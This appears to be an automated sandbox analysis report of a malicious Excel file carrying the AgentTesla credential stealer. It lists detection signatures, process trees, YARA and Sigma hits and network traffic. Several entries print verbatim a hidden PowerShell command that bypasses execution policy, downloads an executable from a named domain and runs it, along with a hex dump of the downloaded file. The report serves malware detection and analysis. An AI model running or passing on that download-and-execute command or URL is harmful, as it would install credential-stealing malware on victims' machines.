Loading ...

Play interactive tourEdit tour

Analysis Report x2hGv.xls

Overview

General Information

Sample Name:x2hGv.xls
Analysis ID:324119
MD5:9e7c47bf75405a4007da5989a93e14ae
SHA1:6f52910e199f61d3c4a6d165266322aa7e40beea
SHA256:7937e499e1d7ddb1cf32b451e5745a70a1878fa658958cd64b1ff46142608bba
Tags:AgentTeslaxls

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected AgentTesla
Bypasses PowerShell execution policy
Creates processes via WMI
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6176 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • splwow64.exe (PID: 6684 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)
  • powershell.exe (PID: 5140 cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/0mrxdv.exe -OutFile C:\Users\Public\kzsuoseu.exe}; & {Start-Process -FilePath 'C:\Users\Public\kzsuoseu.exe'}' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • kzsuoseu.exe (PID: 4980 cmdline: 'C:\Users\Public\kzsuoseu.exe' MD5: B7679C443E22238291F5603F016FF56E)
      • kzsuoseu.exe (PID: 3720 cmdline: C:\Users\Public\kzsuoseu.exe MD5: B7679C443E22238291F5603F016FF56E)
      • kzsuoseu.exe (PID: 2908 cmdline: C:\Users\Public\kzsuoseu.exe MD5: B7679C443E22238291F5603F016FF56E)
  • powershell.exe (PID: 5152 cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/0mrxdv.exe -OutFile C:\Users\Public\kzsuoseu.exe}; & {Start-Process -FilePath 'C:\Users\Public\kzsuoseu.exe'}' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • kzsuoseu.exe (PID: 340 cmdline: 'C:\Users\Public\kzsuoseu.exe' MD5: B7679C443E22238291F5603F016FF56E)
      • kzsuoseu.exe (PID: 1276 cmdline: C:\Users\Public\kzsuoseu.exe MD5: B7679C443E22238291F5603F016FF56E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
x2hGv.xlsPowerShell_in_Word_DocDetects a powershell and bypass keyword in a Word documentFlorian Roth
  • 0x30b17:$s1: powershell.exe
  • 0x30b4b:$s2: Bypass

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000020.00000002.512857021.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000001E.00000002.512846183.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000001E.00000002.517410050.0000000002F81000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000001E.00000002.517410050.0000000002F81000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000001A.00000002.511700350.00000000041C1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 12 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            30.2.kzsuoseu.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              32.2.kzsuoseu.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Executables Started in Suspicious FolderShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\kzsuoseu.exe' , CommandLine: 'C:\Users\Public\kzsuoseu.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\kzsuoseu.exe, NewProcessName: C:\Users\Public\kzsuoseu.exe, OriginalFileName: C:\Users\Public\kzsuoseu.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/0mrxdv.exe -OutFile C:\Users\Public\kzsuoseu.exe}; & {Start-Process -FilePath 'C:\Users\Public\kzsuoseu.exe'}', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5140, ProcessCommandLine: 'C:\Users\Public\kzsuoseu.exe' , ProcessId: 4980
                Sigma detected: Execution in Non-Executable FolderShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\kzsuoseu.exe' , CommandLine: 'C:\Users\Public\kzsuoseu.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\kzsuoseu.exe, NewProcessName: C:\Users\Public\kzsuoseu.exe, OriginalFileName: C:\Users\Public\kzsuoseu.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/0mrxdv.exe -OutFile C:\Users\Public\kzsuoseu.exe}; & {Start-Process -FilePath 'C:\Users\Public\kzsuoseu.exe'}', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5140, ProcessCommandLine: 'C:\Users\Public\kzsuoseu.exe' , ProcessId: 4980
                Sigma detected: Suspicious Program Location Process StartsShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\kzsuoseu.exe' , CommandLine: 'C:\Users\Public\kzsuoseu.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\kzsuoseu.exe, NewProcessName: C:\Users\Public\kzsuoseu.exe, OriginalFileName: C:\Users\Public\kzsuoseu.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/0mrxdv.exe -OutFile C:\Users\Public\kzsuoseu.exe}; & {Start-Process -FilePath 'C:\Users\Public\kzsuoseu.exe'}', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5140, ProcessCommandLine: 'C:\Users\Public\kzsuoseu.exe' , ProcessId: 4980

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Multi AV Scanner detection for domain / URLShow sources
                Source: sparepartiran.comVirustotal: Detection: 10%Perma Link
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\Public\kzsuoseu.exeMetadefender: Detection: 21%Perma Link
                Source: C:\Users\Public\kzsuoseu.exeReversingLabs: Detection: 55%
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeMetadefender: Detection: 21%Perma Link
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeReversingLabs: Detection: 55%
                Multi AV Scanner detection for submitted fileShow sources
                Source: x2hGv.xlsReversingLabs: Detection: 22%
                Machine Learning detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeJoe Sandbox ML: detected
                Source: C:\Users\Public\kzsuoseu.exeJoe Sandbox ML: detected
                Source: 32.2.kzsuoseu.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: 30.2.kzsuoseu.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: global trafficDNS query: name: g.msn.com
                Source: global trafficTCP traffic: 192.168.2.5:49737 -> 162.223.88.131:80
                Source: global trafficTCP traffic: 192.168.2.5:49737 -> 162.223.88.131:80
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Nov 2020 11:02:53 GMTServer: ApacheLast-Modified: Thu, 26 Nov 2020 22:27:22 GMTAccept-Ranges: bytesContent-Length: 518656Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 97 2b c0 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 be 03 00 00 2a 04 00 00 00 00 00 ee dc 03 00 00 20 00 00 00 e0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 dc 03 00 4b 00 00 00 00 e0 03 00 b8 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 bc 03 00 00 20 00 00 00 be 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 26 04 00 00 e0 03 00 00 28 04 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 08 00 00 02 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 dc 03 00 00 00 00 00 48 00 00 00 02 00 05 00 84 31 00 00 78 37 00 00 03 00 00 00 6f 00 00 06 fc 68 00 00 98 73 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 85 00 00 00 01 00 00 11 02 28 01 00 00 0a 38 36 00 00 00 38 f0 ff ff ff fe 0c 00 00 45 03 00 00 00 43 00 00 00 38 00 00 00 5f 00 00 00 38 3e 00 00 00 02 28 06 00 00 06 20 00 00 00 00 17 3a d9 ff ff ff 26 38 cf ff ff ff 02 28 02 00 00 06 20 01 00 00 00 16 39 c2 ff ff ff 26 20 01 00 00 00 38 b7 ff ff ff 02 28 03 00 00 06 38 c2 ff ff ff 02 28 04 00 00 06 20 02 00 00 00 17 3a 9b ff ff ff 26 20 01 00 00 00 38 90 ff ff ff 2a 00 00 00 13 30 07 00 49 01 00 00 02 00 00 11 38 2a 00 00 00 fe 0c 02 00 45 07 00 00 00 11 00 00 00 67 00 00 00 83 00 00 00 b3 00 00 00 3c 00 00 00 a7 00 00 00 21 00 00 00 38 0c 00 00 00 20 d9 03 00 00 13 00 38 3a 00 00 00 17 28 09 00 00 06 20 02 00 00 00 38 be ff ff ff 2a 38 5c 00 00 00 20 00 00 00 00 28 08 00 00 06 39 a9 ff ff ff 26 38 9f ff ff ff 38 d0 ff ff ff 20 03 00 00 00 38 94 ff ff ff 73 02 00 00 0a 13 01 20 01 00 00 00 28 08 00 00 06 39 7e ff ff ff 26 38 74 ff ff ff 73 1d 00 00 06 13 05 20 05 00 00 00 28 08
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Nov 2020 11:02:53 GMTServer: ApacheLast-Modified: Thu, 26 Nov 2020 22:27:22 GMTAccept-Ranges: bytesContent-Length: 518656Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 97 2b c0 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 be 03 00 00 2a 04 00 00 00 00 00 ee dc 03 00 00 20 00 00 00 e0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 dc 03 00 4b 00 00 00 00 e0 03 00 b8 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 bc 03 00 00 20 00 00 00 be 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 26 04 00 00 e0 03 00 00 28 04 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 08 00 00 02 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 dc 03 00 00 00 00 00 48 00 00 00 02 00 05 00 84 31 00 00 78 37 00 00 03 00 00 00 6f 00 00 06 fc 68 00 00 98 73 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 85 00 00 00 01 00 00 11 02 28 01 00 00 0a 38 36 00 00 00 38 f0 ff ff ff fe 0c 00 00 45 03 00 00 00 43 00 00 00 38 00 00 00 5f 00 00 00 38 3e 00 00 00 02 28 06 00 00 06 20 00 00 00 00 17 3a d9 ff ff ff 26 38 cf ff ff ff 02 28 02 00 00 06 20 01 00 00 00 16 39 c2 ff ff ff 26 20 01 00 00 00 38 b7 ff ff ff 02 28 03 00 00 06 38 c2 ff ff ff 02 28 04 00 00 06 20 02 00 00 00 17 3a 9b ff ff ff 26 20 01 00 00 00 38 90 ff ff ff 2a 00 00 00 13 30 07 00 49 01 00 00 02 00 00 11 38 2a 00 00 00 fe 0c 02 00 45 07 00 00 00 11 00 00 00 67 00 00 00 83 00 00 00 b3 00 00 00 3c 00 00 00 a7 00 00 00 21 00 00 00 38 0c 00 00 00 20 d9 03 00 00 13 00 38 3a 00 00 00 17 28 09 00 00 06 20 02 00 00 00 38 be ff ff ff 2a 38 5c 00 00 00 20 00 00 00 00 28 08 00 00 06 39 a9 ff ff ff 26 38 9f ff ff ff 38 d0 ff ff ff 20 03 00 00 00 38 94 ff ff ff 73 02 00 00 0a 13 01 20 01 00 00 00 28 08 00 00 06 39 7e ff ff ff 26 38 74 ff ff ff 73 1d 00 00 06 13 05 20 05 00 00 00 28 08
                Source: Joe Sandbox ViewIP Address: 162.223.88.131 162.223.88.131
                Source: Joe Sandbox ViewASN Name: COLOUPUS COLOUPUS
                Source: global trafficHTTP traffic detected: GET /js/2Q/0mrxdv.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: sparepartiran.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /js/2Q/0mrxdv.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: sparepartiran.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /js/2Q/0mrxdv.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: sparepartiran.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /js/2Q/0mrxdv.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: sparepartiran.comConnection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: g.msn.com
                Source: kzsuoseu.exe, 0000001E.00000002.517410050.0000000002F81000.00000004.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.517955962.00000000028D1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: kzsuoseu.exe, 00000020.00000002.517955962.00000000028D1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                Source: powershell.exe, 00000015.00000002.479159351.000001F1C27FD000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.493294610.0000022BEDB5B000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: powershell.exe, 00000016.00000002.496165200.0000022BEDD0D000.00000004.00000001.sdmpString found in binary or memory: http://crl.micro
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                Source: powershell.exe, 00000015.00000002.476805076.000001F1BA660000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.483459568.0000022B90060000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                Source: kzsuoseu.exe, 00000020.00000002.517955962.00000000028D1000.00000004.00000001.sdmpString found in binary or memory: http://pYJvKF.com
                Source: powershell.exe, 00000016.00000002.461243682.0000022B80213000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: kzsuoseu.exeString found in binary or memory: http://schemas.microso
                Source: powershell.exe, 00000015.00000002.457583835.000001F1AA601000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.459466804.0000022B80001000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000015.00000002.467351207.000001F1AB300000.00000004.00000001.sdmpString found in binary or memory: http://sparepartiran.c
                Source: powershell.exe, 00000015.00000002.467224652.000001F1AB2E2000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.468576835.0000022B80B86000.00000004.00000001.sdmpString found in binary or memory: http://sparepartiran.com
                Source: powershell.exe, 00000016.00000002.470123468.0000022B80DD9000.00000004.00000001.sdmpString found in binary or memory: http://sparepartiran.com/js/2Q/0m
                Source: PowerShell_transcript.472847.mNQ4U7A3.20201128120249.txt.22.drString found in binary or memory: http://sparepartiran.com/js/2Q/0mrxdv.exe
                Source: powershell.exe, 00000015.00000002.458808161.000001F1AA812000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.461243682.0000022B80213000.00000004.00000001.sdmpString found in binary or memory: http://sparepartiran.com/js/2Q/0mrxdv.exe0yPw
                Source: powershell.exe, 00000015.00000002.467224652.000001F1AB2E2000.00000004.00000001.sdmpString found in binary or memory: http://sparepartiran.comx
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: powershell.exe, 00000016.00000002.461243682.0000022B80213000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000003.474308723.00000000063F7000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000003.473687241.000000000640B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: kzsuoseu.exe, 0000001C.00000003.467671944.0000000006423000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmle
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: kzsuoseu.exe, 0000001C.00000003.473632022.000000000640B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersB
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: kzsuoseu.exe, 0000001C.00000003.473829271.000000000640B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersGK
                Source: kzsuoseu.exe, 0000001C.00000003.473687241.000000000640B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersx
                Source: kzsuoseu.exe, 0000001C.00000003.474308723.00000000063F7000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
                Source: kzsuoseu.exe, 0000001C.00000003.474308723.00000000063F7000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comce2
                Source: kzsuoseu.exe, 0000001A.00000002.509575861.00000000018A7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comcom
                Source: kzsuoseu.exe, 0000001A.00000002.509575861.00000000018A7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.come.comk
                Source: kzsuoseu.exe, 0000001A.00000002.509575861.00000000018A7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.como
                Source: kzsuoseu.exe, 0000001C.00000003.474308723.00000000063F7000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comueom
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: kzsuoseu.exe, 0000001C.00000003.470620927.000000000640B000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: kzsuoseu.exe, 0000001C.00000003.470620927.000000000640B000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/s
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000003.473393789.000000000640B000.00000004.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: kzsuoseu.exe, 0000001C.00000003.470534192.000000000641F000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmo
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
